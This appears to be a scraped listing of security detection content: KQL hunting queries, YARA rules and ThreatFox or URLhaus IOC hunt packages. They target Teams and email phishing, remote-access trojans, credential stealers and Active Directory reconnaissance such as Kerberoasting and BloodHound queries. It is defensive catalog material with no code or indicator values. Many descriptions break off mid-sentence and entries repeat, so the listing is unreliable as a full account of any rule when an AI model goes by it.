This query visualises the daily amount of admin false positive Teams message submissions
T1566
CloudAppEvents
This query visualizes Teams messages submitted by users or admins then graded in the submission process.
Teams blocked URL clicks daily trend
kql medium
T1566
UrlClickEvents
This query visualizes the daily amount of blocked Url clicks performed by users on Urls in Teams messages.
Teams Malware ZAP
kql medium
T1566
This query helps hunt for Teams messages with Malware threats that have been ZAPed.
Teams Message with URL listed on OpenPhish
kql medium
T1566
This query can be used as a Custom Detection Rule (CDR) to trigger when a potentially malicious Teams message with a URL from OpenPhish was delivered.
T1566
EmailEventsEmailUrlInfo
This query helps hunt for Teams messages that have been ZAPed with the same URL in Email.
T1566
This query helps hunt for Teams messages from a specific sender by ThreadType.
Teams messages with suspicious URL domains
kql medium
T1566
This query helps hunt for Teams messages with suspicious URL domains.
Teams Phish ZAP
kql medium
T1566
This query helps hunt for Teams messages with Phish threats that have been ZAPed.
Teams post delivery events daily trend
kql medium
T1566
This query visualizes the daily amount of post delivery events on Teams messages.
Teams Spam ZAP
kql medium
T1566
This query helps hunt for Teams messages with Spam threats that have been ZAPed.
T1566
UrlClickEvents
This rule detects and alerts on known threats in Teams messages when a contained domain or URL matches a Microsoft Defender Threat Intelligence indicator (of type 'Domain' or 'URL')
T1566
UrlClickEvents
This query visualizes user clicks in Teams summarizing the data by the various URLs and Click actions on them.
T1566
UrlClickEvents
This query visualizes clicks through actions on Phish or Malware URLs in Teams, summarizing the data by Urls.
Teams User submissions daily trend
kql medium
T1566
CloudAppEvents
This query visualises the daily amount of user false negative and false postive Teams message submissions
T1566
UrlClickEvents
This query helps hunt for Teams users clicking on suspicious URL domains.
ThreatFox: Evilginx IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Evilginx
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 27 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 20 IOCs associated with KongTuke
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 22 IOCs associated with Unknown malware
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 9 IOCs associated with AdaptixC2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 17 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Cobalt Strike is a penetration testing tool often weaponized for initial access, lateral movement, and command-and-control (C2) communication, leveraging IP
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
DCRat is a remote access Trojan that enables attackers to exfiltrate data and execute commands on infected systems. It typically arrives via network-based C2 communication through specified IP:port pairs, often leveraging
ThreatFox: Formbook IOCs
ioc-hunt high
DnsEvents
Form
ThreatFox: Havoc IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Havoc
ThreatFox: Loki Password Stealer (PWS) IOCs
ioc-hunt high
UrlClickEvents
The Loki Password Stealer (PWS) is a malware family designed to exfiltrate credentials and sensitive data from infected systems. It typically arrives via phishing emails or malicious URLs that download the payload to compromised endpoints. SOC analysts should monitor for unusual network traffic, lateral movement, and signs of credential dumping beyond the observed URLs.
ThreatFox: Quasar RAT IOCs
ioc-hunt high
DnsEvents
Quasar RAT is a remote access trojan that enables attackers to
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 5 IOCs associated with Remcos
ThreatFox: Sliver IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with Sliver
ThreatFox: ValleyRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 3 IOCs associated with ValleyRAT
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Vidar is a credential-stealing malware that exfiltrates sensitive data via encrypted channels, often targeting banking credentials and system information. It typically arrives through phishing emails containing malicious URLs or via compromised domains
ThreatFox: XWorm IOCs
ioc-hunt high
DnsEvents
Hunt package for 2 IOCs associated with XWorm
Top 10 Attacked user by Phish messages
kql medium
T1566
Top 10 attacked users by Phish messages from external senders using Teams
T1562
This query visulises all up Top 10 external senders sending Teams messages
T1562
This query looking for top 10 External senders sending Team phishing messsages.
T1566
CloudAppEvents
This query visualises Teams messages submitted by admins as false negatives, summarizing the data by top 10 sender domains of those messages
T1566
CloudAppEvents
This query visualises Teams messages submitted by users as false negatives or false positives, summarizing the data by top 10 sender domains of those messages
T1566
CloudAppEvents
This query visualises Teams messages submitted by admins as false negatives, summarizing the data by top 10 indidvidual senders of those messages
T1566
CloudAppEvents
This query visualises Teams messages submitted by admins as false positives, summarizing the data by top 10 indidvidual senders of those messages
T1566
CloudAppEvents
This query visualises Teams messages submitted by user as false negatives or false positives, summarizing the data by top 10 indidvidual senders of those messages
T1566
UrlClickEvents
This query visualizes Top 10 Users clicking on malicious Phish or Malware URLs in Teams.
T1566
CloudAppEvents
This query visualises the top admins performing false negative or false positive admin submissions of Teams messages
T1566
CloudAppEvents
This query visualises the top users performing false negative or false positive user submissions of Teams messages
T1566
This query looking for potential partner compromise via comparing outbound Teams message traffic per target domain and looking for malicious Teams messages from the same domains as inbound.
Top External malicious Senders
kql medium
T1566
Top external senders sending malicious inbound Teams messages Spam, Phish, Malware
Top External Sender domains - Malware
kql medium
T1566
Top External Sender domains sending Teams message with Malware threats
Top External Sender domains - Phish
kql medium
T1566
Top External Sender domains sending Teams message with Phish threats
Top External Sender domains - Spam
kql medium
T1566
Top External Sender domains sending Teams message with Spam threats
Top malicious URLs clicked by users in Teams
kql medium
T1566
UrlClickEvents
This query helps hunt for top malicious URLs clicked by users in Teams
Top policies performing admin overrides
kql medium
T1566
EmailEvents
This query helps in reviewing top policies for admin overrides (Allow/Block)
T1562
This query visulises Total number of MDO Teams protection detections daily
URL click on URLs in ZAP-d Teams messages
kql medium
T1566
UrlClickEvents
This query visualizes URL clicks on URLs in Teams messages which were acted by ZAP.
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 14 malicious URLs tagged as 32-bit
URLhaus: arm Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 10 malicious URLs tagged as arm
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 77 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 18 malicious URLs tagged as elf
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 5 malicious URLs tagged as malware_download
URLhaus: mirai Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as mirai
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 5 malicious URLs tagged as Mozi
URLhaus: sh Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as sh
XDP embedded PDF
yara low
YARA rule: XDP_embedded_PDF
APT OLE JSRat
yara low
YARA rule: APT_OLE_JSRat
Changes to Blocked Teams Domains
kql medium
T1562
CloudAppEvents
This query detects changes to blocked Teams domains.
Changes to Blocked Teams Domains (NRT)
kql medium
T1562
CloudAppEvents
This query detects changes to blocked Teams domains and can be used as an NRT detection.
T1204
CloudAppEvents
In this query, we are looking for emails containing malware accessed on a unmanaged device
T1534
EmailAttachmentInfoEmailEvents
In this query, we are looking for emails containing malware attachment sent by an internal sender
Email malware detection report
kql medium
T1566
EmailAttachmentInfoEmailEvents
This query helps reviewing email malware detection cases
Email Top Domains sending Malware
kql medium
T1566
EmailEvents
This query visualises total inbound emails with Malware detections summarizing the data by the top email sender P2 domain (SenderFromDomain)
Expanding recipients into separate rows
kql medium
T1566
This query helps hunt for recipients of Teams messages.
T1566
This query helps hunt for external malicious Teams messages sent from internal senders
T1566
CloudAppEvents
This query visualises total Malware detections of files located on SharePoint, OneDrive and Teams over time summarizing the data by the various Malware families detected focusing on built-in SharePoin
T1566
CloudAppEvents
This query visualises total Malware detections of files located on SharePoint, OneDrive and Teams over time summarizing the data by the various Malware families detected focusing on Defender for Offic
File Malware Detection Trend
kql medium
T1566
CloudAppEvents
This query visualises total files located on SharePoint, OneDrive and Teams with Malware detections over time summarizing the data daily.
T1566T1078
AlertEvidenceCloudAppEvents
Correlates Microsoft Teams message activity with downstream Defender alerts on the recipient (victim) identity, surfacing potential phishing or social-engineering chats that are followed by alert acti
T1566
UrlClickEvents
This query helps hunt for Teams messages with malicious URLs based on external Threat Intelligence source
T1566T1219
DeviceProcessEvents
Correlates inbound Microsoft Teams messages with subsequent execution of common Remote Monitoring and Management (RMM) tools (QuickAssist, AnyDesk, TeamViewer) on the recipient's device within a shor
Inbound Teams messages by sender domains
kql medium
T1562
This query helps reviewing volume of inbound external Teams message by sender domains
T1562
This query helps reviewing malicious Teams message detections by URL detection methods
T1566
This query helps hunt for malicious Teams messages received from external senders.
Malware Detections by delivery location
kql medium
T1566
EmailEvents
This query visualises total emails with Malware detections over time summarizing the data daily by Delivery Location.
Malware Detections by Detection technology
kql medium
T1566
EmailEvents
This query visualises total emails with Malware detections summarizing the data by various Malware detection technologies/controls.
T1566
EmailEvents
This query visualises total emails with Malware detections over time summarizing the data daily by various Malware detection technologies/controls.
Malware detections by Workload Locations
kql medium
T1566
CloudAppEvents
This query visualises the amount of total Malware detections of files located on SharePoint, OneDrive and Teams, summarizing by the locations they are stored
Malware detections by Workload Type
kql medium
T1566
CloudAppEvents
This query visualises the amount of total Malware detections of files located on SharePoint, OneDrive and Teams, summarizing by the workload in which they are stored
Malware Detections Trend
kql medium
T1566
EmailEvents
This query visualises total emails with Malware detections over time summarizing the data daily.
T1566
AlertEvidence
Use AlertInfo and AlertEvidence to collect general information and clickable links to more IOCs about suspicious external Teams messages.
T1566
CloudAppEvents
This query visualises number of unqiue accounts performing Teams message admin submissions as false negatives or false positives
T1566
CloudAppEvents
This query visualises number of unqiue accounts performing Teams message user submissions as false negatives or false positives
T1562
This query can be used as a Custom Detection Rule (CDR) to trigger when a partner email domain or email address is used in a Sender display name part of an inbound external Teams message
Possible Teams phishing activity
kql medium
T1566
CloudAppEventsDeviceProcessEvents
This query looks for possible Teams phishing activity.
Potentially malicious URL click in Teams
kql medium
T1566
UrlClickEvents
This query provides insights on a potentially malicious URL click in Teams
Rare Domains in External Teams Messages
kql medium
T1566T1204
UrlClickEvents
Detects rare domains (seen in fewer than 3 Teams messages) appearing in external Microsoft Teams threads within the last 24 hours.
Detects RTF files
yara low
Detects RTF files
Spam Detections (High) by delivery location
kql medium
T1566
EmailEvents
This query visualises emails with Spam detections (High confidence) summarizing the data by Delivery Location.
T1566
EmailEvents
This query visualises emails with Spam detections (Normal confidence) summarizing the data by Delivery Location.
T1566
This query helps hunt for communication from suspicious external users.
T1566
This query helps hunt for communication with suspicious external users.
ThreatFox: Kimwolf IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 7 IOCs associated with Kimwolf
ThreatFox: Evilginx IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Evilginx
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 3 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 20 IOCs associated with KongTuke
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 8 IOCs associated with Unknown malware
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with AdaptixC2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 19 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with Cobalt Strike
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
DCRat is a
ThreatFox: Havoc IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Havoc
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
DnsEvents
Hunt package for 3 IOCs associated with Nanocore RAT
ThreatFox: NetSupportManager RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with NetSupportManager RAT
ThreatFox: Quasar RAT IOCs
ioc-hunt high
DnsEvents
Quasar RAT is a remote access trojan that enables attackers to execute commands, steal data, and
ThreatFox: RansomHub IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with RansomHub
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 6 IOCs associated with Remcos
ThreatFox: Vidar IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 121 IOCs associated with Vidar
ThreatFox: XWorm IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 3 IOCs associated with XWorm
Top 100 malicious email senders
kql medium
T1566
EmailEvents
This query helps reviewing top 100 malicious senders
Top 100 senders
kql medium
T1566
EmailEvents
This query helps reviewing top 100 senders in your organization in last 30 days
Top Malware Families
kql medium
T1566
EmailEvents
This query visualises total emails with Malware detections summarizing the data by ThreatNames of the malware detected.
Top Users receiving Malware
kql medium
T1566
EmailEvents
This query visualises total inbound emails with Malware detections summarizing the data by the top recipient email address (RecipientEmailAddress)
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The "
URLhaus: arm Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 18 malicious URLs tagged as arm
URLhaus: botnetdomain Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 10 malicious URLs tagged as botnetdomain
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 26 malicious URLs tagged as elf
URLhaus: opendir Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as opendir
URLhaus: powershell Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as powershell
URLhaus: ua-wget Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 61 malicious URLs tagged as ua-wget
Zero-day Malware Detections Trend
kql medium
T1566
EmailEvents
This query visualises total emails with Malware detections over time summarizing the data daily by Malware detection technologies/controls used for detecting unknown-unique malware.
Zero day threats
kql medium
T1566
EmailEvents
This query helps reviewing zero day threats via URL and file detonations
Audit Email Preview-Download action
kql medium
T1078
CloudAppEvents
This query helps report on who Previewed/Downloaded email messages using the Email entity page in Defender for Office 365
T1566
EmailEvents
This query helps hunting for Automated email notifications and suspicious sign-in activity
Bad email percentage of Inbound emails
kql medium
T1566
EmailEvents
This query visualises bad traffic (% of emails with threats) compared to total inbound emails over time summarising the data daily.
BEC - File sharing tactics - Dropbox
kql medium
T1021
CloudAppEvents
This query helps hunting for BEC - File sharing tactics - Dropbox
T1021
CloudAppEvents
This query helps hunting for BEC - File sharing tactics - OneDrive or SharePoint
blackhole basic
yara low
The 'blackhole_basic' YARA rule detects indicators
Calculate overall MDO efficacy
kql medium
T1566
CloudAppEventsEmailEvents
This query helps calculate overall efficacy of MDO based on threats blocked pre-delivery, post-delivery cleanups, or were uncaught.
Detections by detection methods
kql medium
T1566
EmailEvents
This query helps reviewing malicious email detections by detection methods
Email bombing attacks
kql medium
EmailEvents
This query helps reviewing recipients who are potentially victim of email bombing attacks
T1566
EmailEvents
This query helps getting GeoIP information of emails SenderIPv4 addresses.
Emails containing links to IP addresses
kql medium
T1566
EmailUrlInfo
This query helps hunting for Emails containing links to IP addresses
Good emails from senders with bad patterns
kql medium
T1566
EmailEvents
This query helps hunting for good emails from senders with bad patterns
Hunt for Admin email access
kql medium
T1078
CloudAppEventsEmailEvents
This query helps report on email access by administrators
Hunt for email bombing attacks
kql medium
T1566
EmailEvents
This query helps to hunt for possible email bombing attacks in Microsoft Defender for Office 365.
T1566
EmailEvents
This query helps hunting for email conversation take over attempts
T1566
EmailAttachmentInfo
This query helps hunt for emails with malicious attachments based on SH256 hash from external IOC source
T1566
EmailEventsEmailUrlInfo
This query helps hunt for emails with malicious URLs based on external IOC source
Hunt for TABL changes
kql medium
T1562
CloudAppEvents
This query helps hunting for Tenant allow/block list (TABL) changes in Defender for Office 365
T1098
CloudAppEvents
This query helps hunting for Inbox rule changes which forward-redirect email
Local time to UTC time conversion
kql medium
T1566
EmailEvents
Advanced Hunting has default timezone as UTC time. Filters in Advanced Hunting also work in UTC by default whereas query results are shown in local time if user has selected local time zone in securit
Mail item accessed
kql medium
T1566
CloudAppEvents
This query helps reviewing emails accessed by end users using cloud app events data
Mail reply to new domain
kql medium
T1566
EmailEvents
This query helps reviewing mail that is likely a reply but there is no history of the people chatting and the domain is new
Mailflow by directionality
kql medium
T1566
EmailEvents
This query helps reviewing inbound / outbound / intra-org emails by domain per day
Malicious email senders
kql medium
T1566
EmailEvents
This query helps hunting for emails from a sender with at least one email in quarantine
Malicious emails detected per day
kql medium
T1566
EmailEvents
This query helps reviewing Malware, Phishing, Spam emails caught per day
MDO daily detection summary report
kql medium
T1566
AlertEvidenceCloudAppEventsEmailEvents
This query helps report daily on total number of emails, total number of emails detected aby Defender for Office 365
T1566
CloudAppEventsEmailEvents
Graph of MDO detections trended over time
T1566
EmailEvents
This query can be used as a Custom Detection Rule (CDR) to trigger when a potentially malicious email appearing to come from an Accepted Domain but DMARC had a (transient) TempError result.
T1566
EmailEventsEmailUrlInfo
This query can be used as a Custom Detection Rule (CDR) to trigger when a potentially malicious email with a URL from OpenPhish was delivered to Inbox
New TABL Items
kql medium
T1562
CloudAppEvents
This query helps identifying when new items being added to the Tenant/Allow Block List (TABL) in Defender for Office 365.
T1566
EmailEventsEmailUrlInfo
This query can be used as a Custom Detection Rule (CDR) to trigger when a potentially malicious OAuth app URL has been delivered into an Inbox.
T1566
EmailAttachmentInfoEmailEvents
This query can be used as a Custom Detection Rule (CDR) to trigger when a potentially malicious .SVG file has been delivered into an Inbox.
Sender recipient contact establishment
kql medium
T1566
EmailEvents
This query helps in checking the sender-recipient contact establishment status
ThreatFox: Kimwolf IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 30 IOCs associated with Kimwolf
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 184 IOCs associated with ClearFake
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Unknown malware
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 5 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 2 IOCs associated with Cobalt Strike
ThreatFox: Lumma Stealer IOCs
ioc-hunt high
DnsEvents
The Lumma Stealer malware is a data-exfiltration tool designed to steal sensitive information such as credentials
ThreatFox: Meterpreter IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with Meterpreter
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
UrlClickEvents
Hunt package for 3 IOCs associated with Nanocore RAT
ThreatFox: NetSupportManager RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with NetSupportManager RAT
ThreatFox: RansomHub IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with RansomHub
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEvents
Hunt package for 87 IOCs associated with Vidar
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsUrlClickEvents
Hunt package for 3 IOCs associated with VShell
T1566
EmailEvents
Identifies the top 10 sender domains delivering inbound emails classified as malware, phishing, or spam. Based on Defender for Office 365 workbook: https://techcommunity.microsoft.com/blog/microsoftde
Top 10 External Senders (Malware)
kql medium
T1566
EmailEvents
Identifies the top 10 external sender addresses delivering inbound emails classified as malware. If you want to exclude your own organization's domains (including subdomains), add a filter after the m
Top 10 External Senders (Phish)
kql medium
T1566
EmailEvents
Identifies the top 10 external sender addresses delivering inbound emails classified as phishing. If you want to exclude your own organization's domains (including subdomains), add a filter after the
Top 10 External Senders (Spam)
kql medium
T1566
EmailEvents
Identifies the top 10 external sender addresses delivering inbound emails classified as spam. If you want to exclude your own organization's domains (including subdomains), add a filter after the spam
Top 10 Targeted Users (Malware+Phish+Spam)
kql medium
T1566
EmailEvents
Identifies the top 10 users receiving inbound emails classified as malware, phishing, or spam. Based on concepts from the Defender for Office 365 solution in Sentinel: https://techcommunity.microsoft.
T1566
UrlClickEvents
Visualises the top 10 users with click attempts on URLs in emails detected as malware, phishing, or spam, helping analysts identify risky user behaviour and potential targets. Based on Defender for Of
T1566
EmailEvents
This query helps hunting for top outbound recipient domains which are sending inbound emails with threats
Total number of detections by MDO
kql medium
T1566
CloudAppEventsEmailEvents
Provides a summary of total number of detections
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 26 malicious URLs tagged as 32-bit
URLhaus: apk Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 13 malicious URLs tagged as apk
URLhaus: arm Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The "arm" malware family is designed to exfiltrate sensitive data and establish persistence within infected systems. It typically arrives via phishing
URLhaus: c2-monitor-auto Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 39 malicious URLs tagged as c2-monitor-auto
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 74 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 9 malicious URLs tagged as elf
URLhaus: jar Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The "jar" malware family is a Java-based downloader that establishes command-and-control (C2) communication to exfiltrate data and execute arbitrary
Yara rule for Banking trojan targeting South Korean banks
Angler Exploit Kit Redirector
yara low
Angler Exploit Kit Redirector
ATP policy status check
kql medium
T1562
CloudAppEvents
This query displays the configuration auditing for 'Safe Attachments for SharePoint, OneDrive, and Microsoft Teams' and 'Safe Documents' in Microsoft Defender for Office 365.
Detects scam emails with phishing attachment.
T1566
EmailEvents
This query helps reviewing authentication failure count by authentication type. Update the authentication type below as DMARC, DKIM, SPM, CompAuth
DeviceFileEvents
Identifies browser extension CRX files observed across endpoints. Helps in enumerating commonly installed extensions and hunting for potentially malicious ones. --- Optional Enrichment: To enrich th
CompAuth Failure Trend
kql medium
T1566
EmailEvents
This query visualises total emails with Spoof - Composite Authentication fails summarizing the data daily.
ConnectedNetworkDeviceDiscovery
kql medium
Find devices connected to a monitored network. Please Note line 5 needs to have a monitored network name put in place or commented out to pull everything.
Detects scam emails with phishing attachment.
CryptoWall Resume phish
yara low
YARA rule: CryptoWall_Resume_phish
davivienda
yara low
The 'dav
detect-nbtscan-activity
kql medium
DeviceFileEventsDeviceProcessEvents
This query was originally published in the threat analytics report, Operation Soft Cell. Operation Soft Cell is a series of campaigns targeting users' call logs at telecommunications providers through
Detect-Not-Active-AD-User-Accounts
kql medium
IdentityLogonEvents
// Detect Active Directory service accounts that are not active because their last logon was more than 14 days ago // Replace XXX on line 4 with the naming convention start of your Active Directory se
DeviceProcessEvents
This query was originally published in the threat analytics report, Operation Soft Cell. Operation Soft Cell is a series of campaigns targeting users' call logs at telecommunications providers through
DetectTorRelayConnectivity
kql medium
DeviceNetworkEvents
This advanced hunting query detects processes communicating with known Tor relay IP addresses. The public URL in the query is updated daily at 12PM and 12AM UTC. CSV source is the Tor Project API, obt
DetectTorrentUse
kql medium
DeviceNetworkEvents
Custom detection to find use of torrenting software or browsing related to torrents.
Discover hosts doing possible network scans
kql medium
DeviceNetworkEvents
Looking for high volume queries against a given RemoteIP, per DeviceName, RemotePort and Process. Please change the Timestamp window according your preference/objective, as also the subnet ranges that
DKIM Failure Trend
kql medium
T1566
EmailEvents
This query visualises total emails with Spoof - DKIM fails summarizing the data daily.
DMARC Failure Trend
kql medium
T1566
EmailEvents
This query visualises total emails with Spoof - DMARC fails summarizing the data daily.
docx macro
yara low
YARA rule: docx_macro
doppelpaymer
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Doppelpaymer: More human-operated ransomware. There is also a related blog. DoppelPaymer is ransomware that is spread manually by hu
dropper
yara low
YARA rule: dropper
This rule detects mapin dropper files
Email Generic Phishing
yara low
YARA rule: Email_Generic_Phishing
Email quota limit warning
yara low
The 'Email_quota_limit_warning' rule detects emails indicating a user has exceeded their email storage quota, often used by attackers to mask malicious activity. SOC teams should deploy this rule in email gateways and endpoint EDR solutions to identify potential phishing or malware distribution attempts.
Detects a possible .eml used in the Ukraine BE power attack
Detects a possible .eml used in the Ukraine BE power attack
Empty Sender Phish Delivered to Inbox
kql medium
T1566
EmailEvents
This query detects delivered phishing emails where the Sender is empty based on recently observed campaigns.
DeviceProcessEvents
The query finds attempts to list users or groups using Net commands.
Detects the possible extortion scam on the basis of subjects and keywords
Fake it maintenance bulletin
yara low
YARA rule: Fake_it_maintenance_bulletin
Find_deleted_accounts_and_by_whom
kql medium
IdentityDirectoryEvents
Find accounts that have been deleted and by whom
This rule detects the apk related to hackingteam - These certificates are presents in mailboxes od hackingteam
Applications with Installer as an application name
JNLP-File-Attachment
kql medium
T1566
EmailAttachmentInfo
JNLP file extensions are an uncommon file type often used to deliver malware.
Mapin trojan, not for droppers
yara low
Mapin trojan, not for droppers
MDI_Group_Memebership_Changes
kql medium
IdentityDirectoryEvents
Find accounts that have been added/removed from groups in AD.
Moskow Droid Development
yara low
Moskow Droid Development
MultipleLdaps
kql medium
IdentityQueryEvents
Detect multiple Active Directory LDAP queries made in bin time Replace 10 on line 1 with your desired thershold Replace 1m on line 2 with your desired bin time
MultipleSensitiveLdaps
kql medium
IdentityQueryEvents
// Detect multiple sensitive Active Directory LDAP queries made in bin time // Sensitive queries defined as Roasting or sensitive objects queries // Replace 10 on line 6 with your desired thershold //
NotOnboarded Devices by DeviceName Suffix
kql medium
This query searches for not onboarded devices with a specific Suffix
PasswordSearch
kql medium
IdentityQueryEvents
Detect Active Directory LDAP queries that search for users with comment or description that contains the string "pass" that might suggest for the user password This LDAP query cover MetaSploit - enum_
qakbot-campaign-esentutl
kql medium
DeviceProcessEvents
This query was originally published in the threat analytics report, Qakbot blight lingers, seeds ransomware Qakbot is malware that steals login credentials from banking and financial services. It has
qakbot-campaign-outlook
kql medium
DeviceFileEvents
This query was originally published in the threat analytics report, Qakbot blight lingers, seeds ransomware Qakbot is malware that steals login credentials from banking and financial services. It has
Retefe
yara low
Retefe
Roasting
kql medium
DeviceNetworkEventsIdentityQueryEvents
Detect Active Directory LDAP queries that search for Kerberoasting (SPNs) or accounts with Kerberos preauthentication not required from Azure ATP, and try to get the process initiated the LDAP query f
Safe Attachments detections
kql medium
T1566
EmailEvents
This query provides insights on the detections done by Safe Attachment detections
Seen Connected Networks
kql medium
This query uncovers seen connected networks
Seen IPv4 Network Subnets
kql medium
This query uncovers seen IPAddressV4 network subnets
Seen IPv6 Network Subnets
kql medium
This query uncovers seen IPAddressV6 network subnets
SensitiveLdaps
kql medium
IdentityQueryEvents
Detect Active Directory LDAP queries that search for sensitive objects in the organization This LDAP query cover BloodHound tool
SMB shares discovery
kql medium
DeviceNetworkEvents
Query for processes that accessed more than 10 IP addresses over port 445 (SMB) - possibly scanning for network shares. To read more about Network Share Discovery, see: https://attack.mitre.org/wiki/T
sms-fraud examples
yara low
sms-fraud examples
This is just an example
yara low
This is just an example
smsfraud chinese
yara low
smsfraud chinese
This rule detects apks related with sms fraud
smspay chinnese
yara low
YARA rule: smspay_chinnese
SPF Failure Trend
kql medium
T1566
EmailEvents
This query visualises total emails with Spoof - SPF fails summarizing the data daily.
Spoof attempts with auth failure
kql medium
T1566
EmailEvents
This query helps in checking for spoofing attempts on the domain with Authentication failures
SuspiciousEnumerationUsingAdfind[Nobelium]
kql medium
DeviceProcessEvents
Attackers can use Adfind which is administrative tool to gather information about domain controllers or ADFS servers. They may also rename executables with other benign tools on the system. The below
ThreatFox: Kimwolf IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 20 IOCs associated with Kimwolf
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 107 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 5 IOCs associated with KongTuke
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 51 IOCs associated with Unknown malware
ThreatFox: AsyncRAT IOCs
